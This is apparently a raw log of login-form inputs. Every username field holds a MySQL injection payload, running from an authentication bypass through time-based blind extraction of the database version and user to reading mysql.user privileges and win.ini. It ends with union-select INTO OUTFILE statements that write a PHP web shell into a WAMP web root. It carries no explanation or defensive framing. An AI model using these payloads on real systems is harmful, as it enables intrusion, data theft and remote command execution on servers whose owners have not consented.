User Name:adaPassword:
User Name:' 12Password:
User Name:' OR 1=1#Password:
User Name:' or (() and sleep(3))-- Password:
User Name:' or (() and sleep(6))-- Password:
User Name:' or sleep(3))-- Password:
User Name:' or sleep(7))-- Password:
User Name:' or sleep(7))-- Password:
User Name:' or (() and sleep(3)-- Password:
User Name:' or (() and sleep(3))-- Password:
User Name:' or (() and sleep(10)) #Password:
User Name:' OR IF(1=1,sleep(5),'a') #Password:
User Name:' or (() and sleep(10)) #Password:
User Name:' AND IF(1=1,sleep(5),'a') #Password:
User Name:' OR IF(1=1,sleep(1),'a') #Password:
User Name:' OR IF(1=2,sleep(1),'a') #Password:
User Name:' OR IF(1=1,sleep(1),'a') #Password:
User Name:' OR IF(1=1,sleep(1),'a') #Password:
User Name:' OR IF(1=2,sleep(1),'') #Password:
User Name:' OR IF(length(database())=8,sleep(1),'a') #Password:
User Name:' OR IF(length(database())=7,sleep(1),'a') #Password:
User Name:'+OR+IF(SUBSTRING(version(),1,1)='0',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='1',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='2',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='3',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='4',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='5',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='6',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='7',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='8',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='9',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='.',SLEEP(4),1)--+Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='0',SLEEP(4),1)-- Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='1',SLEEP(4),1)-- Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='2',SLEEP(4),1)-- Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='3',SLEEP(4),1)-- Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='4',SLEEP(4),1)-- Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='5',SLEEP(4),1)-- Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='6',SLEEP(4),1)-- Password:123
User Name:'+OR+IF(SUBSTRING(version(),1,1)='7',SLEEP(4),1)-- Password:123
User Name:1Password:1
User Name:'+OR+IF(SUBSTRING(version(),1,1)='5',SLEEP(4),1)-- Password:1
User Name:'+OR+IF(SUBSTRING(version(),1,1)=5,SLEEP(4),1)-- Password:1
User Name:' OR IF(SUBSTRING(version(),1,1)=5,SLEEP(4),1)-- Password:1
User Name:' OR IF(SUBSTRING(version(),1,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='3',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='4',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='5',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='3',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='4',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='5',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='6',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='7',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='8',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='9',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='.',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),3,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),3,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),3,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),3,1)='3',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),3,1)='4',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),3,1)='5',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='3',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='4',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='5',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='6',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='7',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='8',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='9',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),4,1)='.',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),5,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),5,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),5,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),5,1)='3',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),5,1)='4',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),5,1)='5',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),5,1)='6',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),6,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),6,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),6,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='3',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='4',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='5',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='6',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='7',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='8',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='9',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),7,1)='.',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='3',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='4',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),1,1)='5',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='0',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='1',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='2',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='3',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='4',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='5',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='6',SLEEP(4),1)-- Password:123
User Name:' OR IF(SUBSTRING(version(),2,1)='7',SLEEP(4),1)-- Password:123
User Name:' and extractvalue(1,concat(0x7e,(select group_concat(user,0x7e,file_priv,0x7e) from mysql.user)))-- Password:
User Name:' or if((select user())='r',sleep(5),'a') -- Password:
User Name:' or if((select user())='root',sleep(5),'a') --  Password:
User Name:' or if(substring((select user()),1,1)='r',sleep(5),'a') -- Password:
User Name:' or if((select file_priv from mysql.user where user = 'root') = 'Y',sleep(5),'a') -- Password:
User Name:' or if((select file_priv from mysql.user where user = 'root') = 'Y',sleep(5),'a') -- Password:
User Name:' or if((select file_priv from mysql.user where user = 'root' limit 0,1) = 'Y',sleep(5),'a') -- Password:
User Name:' or if(substring((load_file('C:\\\\Windows\\\\win.ini')),1,1)=';',sleep(5),'a') -- Password:
User Name:' union select "<?php system($_GET['cmd']) ?>" into outfile 'C:/wamp64/www/shell.php'-- Password:
User Name:' union select 1,"<?php system($_GET['cmd']) ?>" into outfile 'C:/wamp64/www/shell.php'-- Password:
